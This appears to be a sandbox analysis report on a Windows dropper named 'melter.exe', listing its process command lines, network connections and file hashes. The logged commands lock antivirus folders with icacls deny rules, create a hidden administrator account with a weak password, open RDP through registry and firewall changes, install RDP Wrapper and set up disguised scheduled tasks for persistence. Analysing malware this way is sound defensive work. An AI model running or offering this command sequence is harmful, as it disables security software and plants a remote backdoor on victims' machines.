"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=28 --always-read-main-dll --field-trial-handle=5012,i,2472183134824798889,14929192463046964975,262144 --variations-seed-version --mojo-platform-channel-handle=7548 /prefetch:1
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\AVG" /deny %username%:(OI)(CI)(F)
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=29 --always-read-main-dll --field-trial-handle=5068,i,2472183134824798889,14929192463046964975,262144 --variations-seed-version --mojo-platform-channel-handle=6424 /prefetch:1
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files (x86)\AVG" /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Norton" /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\chcp.com
chcp 1251
C:\Windows\SysWOW64\icacls.exe
icacls "C:\ProgramData\Norton" /deny Admin:(OI)(CI)(F)
C:\rdp\Rar.exe
"Rar.exe" e -p555 db.rar
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Kaspersky Lab" /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Kaspersky Lab" /deny system:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Programdata\Kaspersky Lab" /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny system:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Programdata\Kaspersky Lab" /deny system:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny system:(OI)(CI)(F)
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im Rar.exe
C:\Windows\SysWOW64\timeout.exe
timeout 2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=7328,i,2472183134824798889,14929192463046964975,262144 --variations-seed-version --mojo-platform-channel-handle=6808 /prefetch:14
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Kaspersky Lab" /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files\Kaspersky Lab" /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Kaspersky Lab" /deny system:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files\Kaspersky Lab" /deny system:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Kaspersky Lab" /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files (x86)\Kaspersky Lab" /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Kaspersky Lab" /deny system:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files (x86)\Kaspersky Lab" /deny system:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Doctor Web" /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "C:\ProgramData\Doctor Web" /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\grizzly" /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "C:\ProgramData\grizzly" /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Cezurity" /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files (x86)\Cezurity" /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Cezurity" /deny %username%:(OI)(CI)(F)
C:\Programdata\RealtekHD\taskhostw.exe
C:\Programdata\RealtekHD\taskhostw.exe
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files\Cezurity" /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\SystemC" /TR "C:\Programdata\RealtekHD\taskhostw.exe" /SC MINUTE /MO 1
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\McAfee" /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "C:\ProgramData\McAfee" /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\rdp\install.vbs"
C:\Windows\SysWOW64\timeout.exe
timeout 2
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\rdp\bat.bat" "
C:\Windows\SysWOW64\reg.exe
reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d 0 /f
C:\Windows\SysWOW64\reg.exe
reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fAllowToGetHelp" /t REG_DWORD /d 1 /f
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\McAfee" /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\netsh.exe
netsh.exe advfirewall firewall add rule name="allow RDP" dir=in protocol=TCP localport=3389 action=allow
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files\Common Files\McAfee" /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\Cleaner" /TR "C:\Programdata\WindowsTask\winlogon.exe" /SC ONLOGON /RL HIGHEST
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Avira" /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "C:\ProgramData\Avira" /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\net.exe
net.exe user "john" "12345" /add
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 user "john" "12345" /add
C:\Windows\SysWOW64\chcp.com
chcp 1251
C:\Windows\SysWOW64\net.exe
net localgroup "Администраторы" "John" /add
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 localgroup "Администраторы" "John" /add
C:\Windows\SysWOW64\net.exe
net localgroup "Administratorzy" "John" /add
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\GRIZZLY Antivirus" /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 localgroup "Administratorzy" "John" /add
C:\Windows\SysWOW64\net.exe
net localgroup "Administrators" John /add
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 localgroup "Administrators" John /add
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files (x86)\GRIZZLY Antivirus" /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\net.exe
net localgroup "Administradores" John /add
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 localgroup "Administradores" John /add
C:\Windows\SysWOW64\net.exe
net localgroup "Пользователи удаленного рабочего стола" John /add
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 localgroup "Пользователи удаленного рабочего стола" John /add
C:\Windows\SysWOW64\net.exe
net localgroup "Пользователи удаленного управления" John /add
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 localgroup "Пользователи удаленного управления" John /add
C:\Windows\SysWOW64\net.exe
net localgroup "Remote Desktop Users" John /add
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 localgroup "Remote Desktop Users" John /add
C:\Windows\SysWOW64\net.exe
net localgroup "Usuarios de escritorio remoto" John /add
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ESET" /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 localgroup "Usuarios de escritorio remoto" John /add
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\net.exe
net localgroup "Uzytkownicy pulpitu zdalnego" John /add
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 localgroup "Uzytkownicy pulpitu zdalnego" John /add
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files\ESET" /deny Admin:(OI)(CI)(F)
C:\Programdata\WindowsTask\winlogon.exe
C:\Programdata\WindowsTask\winlogon.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /C schtasks /query /fo list
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\rdp\RDPWInst.exe
"RDPWInst.exe" -i -o
C:\Windows\SysWOW64\schtasks.exe
schtasks /query /fo list
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -s TermService
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ESET" /deny system:(OI)(CI)(F)
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files\ESET" /deny system:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\ESET" /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "C:\ProgramData\ESET" /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\ESET" /deny system:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "C:\ProgramData\ESET" /deny system:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Panda Security" /deny %username%:(OI)(CI)(F)
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files (x86)\Panda Security" /deny Admin:(OI)(CI)(F)
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -s TermService
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c C:\programdata\microsoft\temp\H.bat
C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\SystemC" /TR "C:\Programdata\RealtekHD\taskhostw.exe" /SC MINUTE /MO 1
C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\Cleaner" /TR "C:\Programdata\WindowsTask\winlogon.exe" /SC ONLOGON /RL HIGHEST
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c C:\programdata\microsoft\temp\Temp.bat
C:\Windows\SysWOW64\timeout.exe
TIMEOUT /T 5 /NOBREAK
C:\Windows\SYSTEM32\netsh.exe
netsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=tcp localport=3389 profile=any action=allow
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ipconfig /flushdns
C:\Windows\system32\ipconfig.exe
ipconfig /flushdns
C:\rdp\RDPWInst.exe
"RDPWInst.exe" -w
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c gpupdate /force
C:\Windows\system32\gpupdate.exe
gpupdate /force
C:\Windows\SysWOW64\reg.exe
reg.exe add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v "john" /t REG_DWORD /d 0 /f
C:\Windows\SysWOW64\net.exe
net accounts /maxpwage:unlimited
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 accounts /maxpwage:unlimited
C:\Windows\SysWOW64\attrib.exe
attrib +s +h "C:\Program Files\RDP Wrapper\*.*"
C:\Windows\SysWOW64\attrib.exe
attrib +s +h "C:\Program Files\RDP Wrapper"
C:\Windows\SysWOW64\attrib.exe
attrib +s +h "C:\rdp"
C:\Windows\SysWOW64\timeout.exe
TIMEOUT /T 3 /NOBREAK
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=7792,i,2472183134824798889,14929192463046964975,262144 --variations-seed-version --mojo-platform-channel-handle=7900 /prefetch:14
C:\Windows\SysWOW64\taskkill.exe
TASKKILL /IM 1.exe /T /F
C:\Windows\SysWOW64\taskkill.exe
TASKKILL /IM P.exe /T /F
C:\Windows\SysWOW64\attrib.exe
ATTRIB +H +S C:\Programdata\Windows
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=32 --always-read-main-dll --field-trial-handle=5284,i,2472183134824798889,14929192463046964975,262144 --variations-seed-version --mojo-platform-channel-handle=7776 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=7628,i,2472183134824798889,14929192463046964975,262144 --variations-seed-version --mojo-platform-channel-handle=7748 /prefetch:14
C:\Users\Admin\Downloads\melter.exe
"C:\Users\Admin\Downloads\melter.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=8128,i,2472183134824798889,14929192463046964975,262144 --variations-seed-version --mojo-platform-channel-handle=8100 /prefetch:14
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | edge.microsoft.com | udp |
| US | 8.8.8.8:53 | edge.microsoft.com | udp |
| US | 8.8.8.8:53 | pixeldrain.com | udp |
| US | 8.8.8.8:53 | pixeldrain.com | udp |
| US | 150.171.27.11:80 | edge.microsoft.com | tcp |
| DE | 203.23.179.12:443 | pixeldrain.com | tcp |
| US | 8.8.8.8:53 | edge.microsoft.com | udp |
| US | 8.8.8.8:53 | edge.microsoft.com | udp |
| DE | 203.23.179.12:443 | pixeldrain.com | tcp |
| US | 8.8.8.8:53 | api.edgeoffer.microsoft.com | udp |
| US | 8.8.8.8:53 | api.edgeoffer.microsoft.com | udp |
| US | 8.8.8.8:53 | copilot.microsoft.com | udp |
| US | 8.8.8.8:53 | copilot.microsoft.com | udp |
| US | 204.79.197.239:443 | edge.microsoft.com | tcp |
| IE | 94.245.104.56:443 | api.edgeoffer.microsoft.com | tcp |
| GB | 95.100.153.132:443 | copilot.microsoft.com | tcp |
| US | 8.8.8.8:53 | stats.pixeldrain.com | udp |
| US | 8.8.8.8:53 | stats.pixeldrain.com | udp |
| NL | 51.158.202.5:443 | stats.pixeldrain.com | tcp |
| DE | 203.23.179.12:443 | pixeldrain.com | tcp |
| NL | 51.158.202.5:443 | stats.pixeldrain.com | tcp |
| US | 204.79.197.239:443 | edge.microsoft.com | tcp |
| GB | 95.100.153.143:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | edgeassetservice.azureedge.net | udp |
| US | 8.8.8.8:53 | edgeassetservice.azureedge.net | udp |
| US | 8.8.8.8:53 | edge.microsoft.com | udp |
| US | 8.8.8.8:53 | edge.microsoft.com | udp |
| US | 13.107.246.64:443 | edgeassetservice.azureedge.net | tcp |
| US | 150.171.28.11:443 | edge.microsoft.com | tcp |
| N/A | 224.0.0.251:5353 | udp | |
| GB | 95.100.153.143:443 | www.bing.com | udp |
| GB | 95.100.153.143:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | aefd.nelreports.net | udp |
| US | 8.8.8.8:53 | aefd.nelreports.net | udp |
| GB | 2.19.252.134:443 | aefd.nelreports.net | tcp |
| GB | 2.19.252.134:443 | aefd.nelreports.net | udp |
| US | 8.8.8.8:53 | r.bing.com | udp |
| US | 8.8.8.8:53 | r.bing.com | udp |
| US | 8.8.8.8:53 | th.bing.com | udp |
| US | 8.8.8.8:53 | th.bing.com | udp |
| GB | 95.100.153.143:443 | th.bing.com | tcp |
| GB | 95.100.153.143:443 | th.bing.com | tcp |
| GB | 95.100.153.143:443 | th.bing.com | tcp |
| GB | 95.100.153.143:443 | th.bing.com | tcp |
| GB | 95.100.153.143:443 | th.bing.com | udp |
| US | 8.8.8.8:53 | login.microsoftonline.com | udp |
| US | 8.8.8.8:53 | login.microsoftonline.com | udp |
| NL | 20.190.160.132:443 | login.microsoftonline.com | tcp |
| US | 8.8.8.8:53 | github.com | udp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | github.githubassets.com | udp |
| US | 8.8.8.8:53 | github.githubassets.com | udp |
| US | 8.8.8.8:53 | avatars.githubusercontent.com | udp |
| US | 8.8.8.8:53 | avatars.githubusercontent.com | udp |
| US | 185.199.109.154:443 | github.githubassets.com | tcp |
| US | 185.199.109.154:443 | github.githubassets.com | tcp |
| US | 185.199.109.154:443 | github.githubassets.com | tcp |
| US | 185.199.109.154:443 | github.githubassets.com | tcp |
| US | 185.199.109.154:443 | github.githubassets.com | tcp |
| US | 185.199.109.154:443 | github.githubassets.com | tcp |
| US | 8.8.8.8:53 | user-images.githubusercontent.com | udp |
| US | 8.8.8.8:53 | user-images.githubusercontent.com | udp |
| US | 185.199.111.133:443 | user-images.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | github-cloud.s3.amazonaws.com | udp |
| US | 8.8.8.8:53 | github-cloud.s3.amazonaws.com | udp |
| US | 185.199.111.133:443 | user-images.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | edge.microsoft.com | udp |
| US | 8.8.8.8:53 | edge.microsoft.com | udp |
| US | 150.171.28.11:443 | edge.microsoft.com | tcp |
| US | 8.8.8.8:53 | collector.github.com | udp |
| US | 8.8.8.8:53 | collector.github.com | udp |
| US | 185.199.109.154:443 | github.githubassets.com | tcp |
| US | 140.82.114.22:443 | collector.github.com | tcp |
| US | 8.8.8.8:53 | api.github.com | udp |
| US | 8.8.8.8:53 | api.github.com | udp |
| US | 140.82.114.22:443 | collector.github.com | tcp |
| GB | 20.26.156.210:443 | api.github.com | tcp |
| US | 8.8.8.8:53 | edge-consumer-static.azureedge.net | udp |
| US | 8.8.8.8:53 | edge-consumer-static.azureedge.net | udp |
| US | 13.107.246.64:443 | edge-consumer-static.azureedge.net | tcp |
| US | 8.8.8.8:53 | raw.githubusercontent.com | udp |
| US | 8.8.8.8:53 | raw.githubusercontent.com | udp |
| US | 185.199.109.133:443 | raw.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | raw.githubusercontent.com | udp |
| US | 185.199.108.133:443 | raw.githubusercontent.com | tcp |
| GB | 95.100.153.143:443 | th.bing.com | udp |
| RU | 77.223.119.187:5655 | rms-server.tektonit.ru | tcp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| UA | 194.0.200.251:465 | freemail.freehost.com.ua | tcp |
| US | 8.8.8.8:53 | static.edge.microsoftapp.net | udp |
| US | 8.8.8.8:53 | static.edge.microsoftapp.net | udp |
| US | 13.107.246.64:443 | static.edge.microsoftapp.net | tcp |
| US | 8.8.8.8:53 | edge-mobile-static.azureedge.net | udp |
| US | 8.8.8.8:53 | edge-mobile-static.azureedge.net | udp |
| US | 8.8.8.8:53 | edge-cloud-resource-static.azureedge.net | udp |
| US | 8.8.8.8:53 | edge-cloud-resource-static.azureedge.net | udp |
| US | 13.107.246.64:443 | edge-cloud-resource-static.azureedge.net | tcp |
| US | 13.107.246.64:443 | edge-cloud-resource-static.azureedge.net | tcp |
| US | 150.171.28.11:443 | edge.microsoft.com | tcp |
| US | 199.232.210.172:80 | msedge.b.tlu.dl.delivery.mp.microsoft.com | tcp |
| GB | 95.100.153.143:443 | th.bing.com | udp |
| GB | 95.100.153.143:443 | th.bing.com | udp |
| US | 8.8.8.8:53 | services.bingapis.com | udp |
| US | 8.8.8.8:53 | services.bingapis.com | udp |
| US | 13.107.5.80:443 | services.bingapis.com | tcp |
| GB | 2.19.252.134:443 | aefd.nelreports.net | udp |
| US | 8.8.8.8:53 | edge.microsoft.com | udp |
| US | 8.8.8.8:53 | edge.microsoft.com | udp |
| US | 8.8.8.8:53 | github.com | udp |
| US | 8.8.8.8:53 | github.com | udp |
| US | 8.8.8.8:53 | github-cloud.s3.amazonaws.com | udp |
| US | 8.8.8.8:53 | collector.github.com | udp |
| US | 8.8.8.8:53 | collector.github.com | udp |
| US | 8.8.8.8:53 | api.github.com | udp |
| US | 8.8.8.8:53 | api.github.com | udp |
| US | 185.199.111.133:443 | raw.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | collector.github.com | udp |
| US | 8.8.8.8:53 | collector.github.com | udp |
| US | 8.8.8.8:53 | github.com | udp |
| US | 8.8.8.8:53 | github.com | udp |
| US | 8.8.8.8:53 | github.githubassets.com | udp |
| US | 8.8.8.8:53 | github.githubassets.com | udp |
| US | 8.8.8.8:53 | avatars.githubusercontent.com | udp |
| US | 8.8.8.8:53 | avatars.githubusercontent.com | udp |
| US | 8.8.8.8:53 | github-cloud.s3.amazonaws.com | udp |
| US | 8.8.8.8:53 | github-cloud.s3.amazonaws.com | udp |
| US | 8.8.8.8:53 | user-images.githubusercontent.com | udp |
| US | 8.8.8.8:53 | user-images.githubusercontent.com | udp |
| US | 8.8.8.8:53 | collector.github.com | udp |
| US | 8.8.8.8:53 | collector.github.com | udp |
| US | 8.8.8.8:53 | github.com | udp |
| US | 8.8.8.8:53 | github.com | udp |
| US | 172.67.74.161:443 | iplogger.org | tcp |
| GB | 142.250.180.3:80 | c.pki.goog | tcp |
| US | 8.8.8.8:53 | collector.github.com | udp |
| US | 8.8.8.8:53 | collector.github.com | udp |
| RU | 152.89.218.85:80 | taskhostw.com | tcp |
| US | 8.8.8.8:53 | collector.github.com | udp |
| US | 8.8.8.8:53 | collector.github.com | udp |
| US | 8.8.8.8:53 | raw.githubusercontent.com | udp |
| US | 185.199.108.133:443 | raw.githubusercontent.com | tcp |
| RU | 152.89.218.85:80 | taskhostw.com | tcp |
| US | 8.8.8.8:53 | api.github.com | udp |
| US | 8.8.8.8:53 | api.github.com | udp |
| RU | 109.248.203.81:21 | tcp | |
| US | 8.8.8.8:53 | edge.microsoft.com | udp |
| US | 8.8.8.8:53 | edge.microsoft.com | udp |
| US | 8.8.8.8:53 | collector.github.com | udp |
| US | 8.8.8.8:53 | collector.github.com | udp |
| US | 8.8.8.8:53 | github.com | udp |
| US | 8.8.8.8:53 | github.githubassets.com | udp |
| US | 8.8.8.8:53 | github.githubassets.com | udp |
| US | 8.8.8.8:53 | avatars.githubusercontent.com | udp |
| US | 8.8.8.8:53 | avatars.githubusercontent.com | udp |
| US | 8.8.8.8:53 | github-cloud.s3.amazonaws.com | udp |
| US | 8.8.8.8:53 | github-cloud.s3.amazonaws.com | udp |
| US | 8.8.8.8:53 | user-images.githubusercontent.com | udp |
| US | 8.8.8.8:53 | user-images.githubusercontent.com | udp |
| US | 8.8.8.8:53 | github.com | udp |
| US | 8.8.8.8:53 | github.com | udp |
| US | 8.8.8.8:53 | collector.github.com | udp |
| US | 8.8.8.8:53 | collector.github.com | udp |
| US | 8.8.8.8:53 | collector.github.com | udp |
| US | 8.8.8.8:53 | collector.github.com | udp |
| US | 8.8.8.8:53 | github.com | udp |
| US | 8.8.8.8:53 | github.com | udp |
| US | 8.8.8.8:53 | raw.githubusercontent.com | udp |
| US | 8.8.8.8:53 | raw.githubusercontent.com | udp |
| US | 8.8.8.8:53 | github.com | udp |
| US | 8.8.8.8:53 | github.com | udp |
| US | 8.8.8.8:53 | github.githubassets.com | udp |
| US | 8.8.8.8:53 | github.githubassets.com | udp |
| US | 8.8.8.8:53 | raw.githubusercontent.com | udp |
| US | 8.8.8.8:53 | raw.githubusercontent.com | udp |
| US | 8.8.8.8:53 | collector.github.com | udp |
| US | 8.8.8.8:53 | collector.github.com | udp |
| US | 8.8.8.8:53 | collector.github.com | udp |
| US | 8.8.8.8:53 | collector.github.com | udp |
| US | 8.8.8.8:53 | api.github.com | udp |
| US | 8.8.8.8:53 | api.github.com | udp |
| US | 8.8.8.8:53 | edge.microsoft.com | udp |
| US | 8.8.8.8:53 | edge.microsoft.com | udp |
Files
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | 1a901bfc13170569c8c2f1be7fbdd567 |
| SHA1 | 171be4140e07dfa5cf61ebdf50ace708f0487d41 |
| SHA256 | a8b7e90c1e7fb198dd832f640479d8743b2b22a975a692c588117c8cdaa8be14 |
| SHA512 | 5a73f46a1c690a6609597fe100249b8d44c658f3a5d04d2a04b947848a2cd28eacbad7b6a51fbb08f71d046996dd04fe8c2f4fb23afea52fb7f0bfef0844bca7 |
\??\pipe\crashpad_2492_JKQDMXEKRBJTRFYF
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | 623d0eb0c4a36135a270354557aae018 |
| SHA1 | 864d2599207960d2aedba50ada4a3b1b2a5a8b87 |
| SHA256 | 52b485675b621aa85ff48f5cef95a29f845616b63d9a683bb7503f324cee3d03 |
| SHA512 | 685e69631c295fee7ddb6bedccb9ddab7ac0fd5d5476f5236ee22d7b8af871f9705be8f30ec71b0bfdeabc69927be677942bf8bfcfbdb7ed1151e7dfe80105ee |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\SCT Auditing Pending Reports
| MD5 | d751713988987e9331980363e24189ce |
| SHA1 | 97d170e1550eee4afc0af065b78cda302a97674c |
| SHA256 | 4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945 |
| SHA512 | b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\HubApps
| MD5 | 40e2018187b61af5be8caf035fb72882 |
| SHA1 | 72a0b7bcb454b6b727bf90da35879b3e9a70621e |
| SHA256 | b3efd9d75856016510dd0bdb5e22359925cee7f2056b3cde6411c55ae8ae8ee5 |
| SHA512 | a21b8f3f7d646909d6aed605ad5823269f52fda1255aa9bb4d4643e165a7b11935572bf9e0a6a324874f99c20a6f3b6d1e457c7ccd30adcac83c15febc063d12 |
